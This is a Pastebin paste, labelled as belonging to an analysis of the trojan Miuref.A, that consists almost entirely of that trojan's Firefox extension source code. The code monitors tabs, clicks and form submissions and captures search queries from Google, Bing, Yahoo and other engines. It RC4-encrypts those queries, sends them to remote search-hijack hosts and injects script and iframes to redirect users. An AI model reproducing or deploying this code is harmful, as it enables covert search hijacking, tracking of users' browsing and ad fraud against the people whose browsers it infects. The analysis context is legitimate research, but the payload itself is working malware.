Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Analysis of Trojan:Win32/Miuref.A
- # http://stopmalvertising.com/malware-reports/analysis-of-trojan-win32-miuref-a.html
- MicrosoftDirectInputObject.js
- "
- {
- "e": 0, "c": "(function()
- {
- function Q(a,c)
- {
- try
- {
- var b=y[z+\"xmlextras/xmlhttprequest;
- 1\"].createInstance(k.nsIXMLHttpRequest);
- b.timeout=6E4;
- b.open(\"GET\",a,!0);
- b.overrideMimeType(\"text/plain;
- charset=x-user-defined\");
- b.onreadystatechange=function()
- {
- try
- {
- 4==b.readyState&&c(b.responseText,b.status,b)
- }
- catch(a)
- {
- }
- }
- ;b.send(null)
- }
- catch(d)
- {
- }
- }
- function D(a,c)
- {
- var b=[],d,e,f,g;
- for(d=0;
- 256>d;
- d++)b[d]=d;
- for(d=e=0;
- 256>d;
- d++)e=(e+b[d]+c.charCodeAt(d%c.length))%256,f=b[d],b[d]=b[e],b[e]=f;
- d=e=0;
- var q=\"\";
- for(g=0;
- g<a.length;
- g++)d=(d+\n1)%256,e=(e+b[d])%256,f=b[d],b[d]=b[e],b[e]=f,q+=String.fromCharCode(a.charCodeAt(g)^b[(b[d]+b[e])%256]);
- return q
- }
- function r()
- {
- this.c=[]
- }
- function x(a)
- {
- try
- {
- return a.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIWebNavigation).QueryInterface(k.nsIDocShellTreeItem).rootTreeItem.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIDOMWindow)
- }
- catch(c)
- {
- }
- }
- function E()
- {
- return y[z+\"observer-service;
- 1\"].getService(k.nsIObserverService)
- }
- function F(a)
- {
- try
- {
- var c=x(a.target.ownerDocument.defaultView.top).gBrowser,\nb=c.getBrowserForTab(a.target),d=c.selectedBrowser.contentDocument,e=c.getBrowserForDocument(d);
- b.b=d.location.href;
- b.a=e.a;
- e.a=\"\"
- }
- catch(f)
- {
- }
- }
- function G(a)
- {
- try
- {
- for(var c=a.target;
- c&&(\"A\"!=c.nodeName||!c.href);
- )c=c.parentNode;
- if(c)
- {
- var b=c.ownerDocument,d=this.getBrowserForDocument(b);
- d.b=b.defaultView.location.href;
- d.a=c.href
- }
- }
- catch(e)
- {
- }
- }
- function R(a)
- {
- try
- {
- var c=this.gBrowser;
- if(c)
- {
- var b=a.originalTarget.ownerDocument,d=c.getBrowserForDocument(b);
- d.b=b.location.href;
- d.a=b.location.href
- }
- }
- catch(e)
- {
- }
- }
- \nfunction H(a)
- {
- a.addEventListener(I,J,!1);
- var c=a.gBrowser;
- c.tabContainer.addEventListener(\"TabOpen\",F,!1);
- c.addEventListener(K,G,!0);
- a.addEventListener(\"submit\",R,!0)
- }
- function L(a)
- {
- try
- {
- a.removeEventListener(I,J,!1)
- }
- catch(c)
- {
- }
- a=a.gBrowser;
- a.tabContainer.removeEventListener(\"TabOpen\",F,!1);
- a.removeEventListener(K,G,!0)
- }
- function J(a)
- {
- try
- {
- L(a.originalTarget.defaultView)
- }
- catch(c)
- {
- }
- }
- function C(a)
- {
- try
- {
- var c=a.originalTarget.defaultView;
- c.removeEventListener(\"load\",C,!1);
- if(c.opener)
- {
- var b=c.opener.gBrowser,\nd=b.contentDocument,e=d.location.href,f=b.getBrowserForDocument(d),g=c.gBrowser;
- if(!g)return;
- var q=g.selectedBrowser;
- q.b=e;
- q.a=f.a;
- f.a=\"\"
- }
- H(c)
- }
- catch(k)
- {
- }
- }
- function M(a)
- {
- var c=y[z+\"embedcomp/window-watcher;
- 1\"].getService(k.nsIWindowWatcher);
- try
- {
- for(var b=c.getWindowEnumerator();
- b.hasMoreElements();
- )
- {
- var d=b.getNext().QueryInterface(k.nsIDOMWindow);
- try
- {
- a(d,\"complete\"==d.document.readyState)
- }
- catch(e)
- {
- }
- }
- }
- catch(f)
- {
- }
- }
- function S()
- {
- M(function(a,c)
- {
- c&&(a.gBrowser?H(a):a.addEventListener(\"load\",C,!1))
- }
- )
- }
- function T()
- {
- M(function(a,\nc)
- {
- c&&(a.gBrowser?L(a):a.removeEventListener(\"load\",C,!1))
- }
- )
- }
- function A()
- {
- }
- var y=Components.classes,k=Components.interfaces,K=\"click\",I=\"unload\",z=\"@mozilla.org/\";
- r.prototype=
- {
- addListener:function(a)
- {
- this.j(a)||this.c.push(a)
- }
- ,removeListener:function(a)
- {
- a=this.g(a);
- 0<=a&&this.c.splice(a,1)
- }
- ,g:function(a)
- {
- for(var c=this.c,b=0;
- b<c.length;
- ++b)if(c[b]==a)return b;
- return-1
- }
- ,j:function(a)
- {
- return-1!=this.g(a)
- }
- ,o:function()
- {
- return 0<this.c.length
- }
- ,d:function()
- {
- try
- {
- for(var a=this.c,c=[],b=0;
- b<a.length;
- ++b)
- {
- var d=\na[b];
- if(\"function\"==typeof d)try
- {
- var e=d.apply(this,arguments);
- \"undefined\"!=typeof e&&c.push(e)
- }
- catch(f)
- {
- }
- }
- return c
- }
- catch(g)
- {
- }
- }
- }
- ;var N=new r,U=new r,O=new r,P=new r;
- (function()
- {
- function a(a)
- {
- window.l||(window.l=1,stop(),window.setTimeout(function()
- {
- var m=document.createElement(\"iframe\");
- m.src=a;
- if(document.body)document.body.appendChild(m);
- else
- {
- var b=document.createElement(\"body\");
- b.style.display=\"none\";
- var c=document.childNodes[0];
- c.appendChild(b);
- c.childNodes[0].appendChild(m)
- }
- }
- ,0))
- }
- function c(a,\nm)
- {
- var b=JSON.stringify(
- {
- q:a,p:m,t:u
- }
- );
- return p[s]+btoa(D(b,\"http\"))
- }
- function b(a)
- {
- if(a=v(a))
- {
- var m=a[2],b=a[1];
- n[b]||(n[b]=
- {
- h:Math.floor((new Date).getTime()/1E3),f:
- {
- }
- ,i:
- {
- }
- }
- ,Q(c(b,m),function(a,m)
- {
- if(200==m)
- {
- var B=D(atob(a),u);
- n[b].f=JSON.parse(B)
- }
- else s+=1,s>=p.length&&(s=0)
- }
- ));
- return b
- }
- }
- function d(b,m,c)
- {
- if(m&&(c=v(c))&&!(c[0]>=w.length))
- {
- m=c[1];
- c=w[c[0]][1];
- var d=b;
- c&&(d=c(b));
- if(d&&x.exec(d))try
- {
- var e=Math.floor((new Date).getTime()/1E3),f;
- for(f in n)try
- {
- n[f].h&&n[f].h+6E5<e&&delete n[f]
- }
- catch(h)
- {
- }
- if(n[m])
- {
- var k,\ng=n[m];
- if(g.f&&!g.i[b]&&(g.i[b]=1,k=g.f.u.shift()))return\"(\"+a.toString()+\")('\"+k+\"')\"
- }
- }
- catch(p)
- {
- }
- }
- }
- function e(a)
- {
- var b,c=
- {
- }
- ,d=a.split(\"&\");
- for(b in d)a=d[b].split(\"=\"),c[a[0]]=a[1];
- return c
- }
- function f(a)
- {
- if(a)
- {
- for(var b=h.exec(a),c=0;
- c<t.length;
- ++c)if(-1!=b[1].toLowerCase().indexOf(\".\"+t[c]+\".\"))return;
- return a
- }
- }
- function g(a)
- {
- try
- {
- var b=h.exec(a);
- if(-1==b[1].toLowerCase().indexOf(\".ask.\"))return f(a);
- if(\"/r\"==b[2]&&b[3])
- {
- var c=e(b[3]),d=unescape(c.zu?c.zu:c.u);
- return g(\"/\"==d.charAt(0)?b[0]+d:d)
- }
- }
- catch(k)
- {
- }
- }
- \nfunction q(a)
- {
- try
- {
- var b=h.exec(a);
- if(-1==b[1].toLowerCase().indexOf(\".google.\"))return f(a);
- if(\"/aclk\"==b[2])return a;
- if(\"/url\"==b[2]&&b[3])
- {
- var c=e(b[3]),d=c.url,d=unescape(d?d:c.q);
- return q(\"/\"==d.charAt(0)?b[0]+d:d)
- }
- }
- catch(g)
- {
- }
- }
- function k(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".aol.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- function r(a,b)
- {
- for(var c=0;
- c<a.length;
- ++c)if(b(a[c]))return!0;
- return!1
- }
- function v(a)
- {
- if(a=h.exec(a))for(var b=a[1].toLowerCase(),c=a[2].toLowerCase(),d=0;
- d<w.length;
- ++d)
- {
- var f=\nw[d];
- if(-1!=b.indexOf(f[2]))
- {
- if(r(f[3],function(a)
- {
- return a==c
- }
- )||r(f[4],function(a)
- {
- return 0<=c.indexOf(a)
- }
- ))if(b=
- {
- }
- ,f[6]&&a[4]?b=e(a[4]):a[3]&&(b=e(a[3])),f[5]in b)return[d,escape(unescape(b[f[5]].replace(/\\+/g,\" \"))),f[0]];
- break
- }
- }
- }
- var n=
- {
- }
- ,u=\"\";
- N.addListener(function(a)
- {
- u=a;
- O.addListener(b);
- P.addListener(d)
- }
- );
- var p=[\"http://searchpagex.com/s?q=\",\"http://searchpagex.org/s?q=\"],s=Math.floor(Math.random()*p.length),h=/^https?:\\/\\/(.*?)(\\/[^\\?#]*)(?:\\?([^#]*))?(?:#(.*))?/i,x=/^https?\\:\\/\\//i,t=\"google facebook youtube yahoo amazon wikipedia ebay gmail twitter craigslist linkedin live go pinterest bing tumblr paypal aol cnn netflix weather apple imgur imdb zedo nytimes microsoft walmart yelp wellsfargo comcast foxnews hulu myspace reddit pandora reference\".split(\" \"),\nw=[[0,q,\".google.\",[\"/webhp\",\"/gen_204\",\"/search\",\"/\"],[],\"q\",!0],[1,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".bing.\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\".bing.\",[\"/search\"],[],\"q\",!1],[2,function(a)
- {
- try
- {
- var b;
- if(b=h.exec(a))
- {
- var c=b[1].toLowerCase(),d=b[2].toLowerCase();
- if(-1!=c.indexOf(\".yahoo.\"))
- {
- if(0!=d.indexOf(\"/r/\"))return;
- a=unescape(a.substr(a.indexOf(\"**http\")+2))
- }
- return f(a)
- }
- }
- catch(e)
- {
- }
- }
- ,\".yahoo.\",[],[\"/search\"],\"p\",!1],[3,k,\".aol.com\",[],[\"/search\"],\"q\",!1],[3,k,\".aol.ca\",\n[],[\"/search\"],\"q\",!1],[4,g,\".ask.com\",[\"/web\"],[],\"q\",!1],[6,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"avg.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\"search.avg.com\",[\"/search\"],[],\"q\",!0],[9,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".mywebsearch.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\".mywebsearch.com\",[],[\"ggmain.jhtml\",\"ggweb.jhtml\"],\"searchfor\",!1],[15,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".search-results.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\n\".search-results.com\",[\"/web\"],[],\"q\",!1],[18,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"comcast.net\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\"search.comcast.net\",[\"/\"],[],\"q\",!1],[23,null,\".delta-search.com\",[\"/\"],[],\"q\",!1]]
- }
- )();
- A.prototype=
- {
- m:function()
- {
- var a=E();
- a.addObserver(this,\"toplevel-window-ready\",!1);
- a.addObserver(this,\"http-on-examine-response\",!1);
- a.addObserver(this,\"content-document-global-created\",!1);
- S()
- }
- ,n:function()
- {
- var a=E();
- a.removeObserver(this,\"toplevel-window-ready\");
- \na.removeObserver(this,\"http-on-examine-response\");
- a.removeObserver(this,\"content-document-global-created\");
- T()
- }
- }
- ;A.prototype.observe=function(a,c,b)
- {
- switch(c)
- {
- case \"toplevel-window-ready\":a.addEventListener(\"load\",C,!1);
- break;
- case \"http-on-examine-response\":try
- {
- if(a)
- {
- var d=a.QueryInterface(k.nsIHttpChannel),e=x(d.notificationCallbacks);
- !e&&d.loadGroup&&(e=x(d.loadGroup.notificationCallbacks));
- if(e)
- {
- var f=e.content.document,g=e.gBrowser;
- if(g)
- {
- var q=g.getBrowserForDocument(f);
- if(q.e)
- {
- var r=d.responseStatus;
- \nif(\"4\"==r[0]||\"5\"==r[0])q.e=0,f.location=q.k
- }
- else O.d(d.name)
- }
- }
- }
- }
- catch(t)
- {
- }
- break;
- case \"content-document-global-created\":if(b&&\"null\"!=b)try
- {
- var v=a.top;
- if(a==v)
- {
- var n=v.document,u=x(v).gBrowser;
- u||(u=x(v).wrappedJSObject.gBrowser);
- if(u)
- {
- var p=u.getBrowserForDocument(n);
- if(p)
- {
- var s=a.document.referrer,h=v.location.href;
- \"about:blank\"==h&&(h=\"\");
- var y=p.b,z=p.a;
- h&&(p.a=\"\");
- p.e=0;
- s||z||(p.b=\"\");
- s?p.a=\"\":s=z;
- if(h&&s&&y)
- {
- p.b=\"\";
- var w=P.d(h,s,y);
- if(w&&w.length)
- {
- p.e=1;
- p.k=h;
- var n=a.document,B=n.documentElement,\nm=B?B:n.createElement(\"html\");
- m.innerHTML='<html><head><title>Connecting...</title></head><body style=\"display:none\"></body></html>';
- B||n.appendChild(m);
- n.getElementsByTagName(\"head\");
- var A=n.createElement(\"script\");
- A.innerHTML=\"(function()
- {
- try
- {
- \"+w.join(\"
- }
- catch(e)
- {
- }
- ;try
- {
- \")+\"
- }
- catch(e)
- {
- }
- }
- ())\";
- m.appendChild(A)
- }
- }
- }
- }
- }
- }
- catch(D)
- {
- }
- }
- }
- ;var t;
- return[function(a)
- {
- N.d(a);
- t=new A;
- t.m()
- }
- ,function()
- {
- t&&(t.n(),t=null);
- U.d()
- }
- ]
- }
- )();
- \n", "u": ["http://search-page.net", "http://search-direct.net", "http://searchtop.org"], "v": 4
- }
- "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement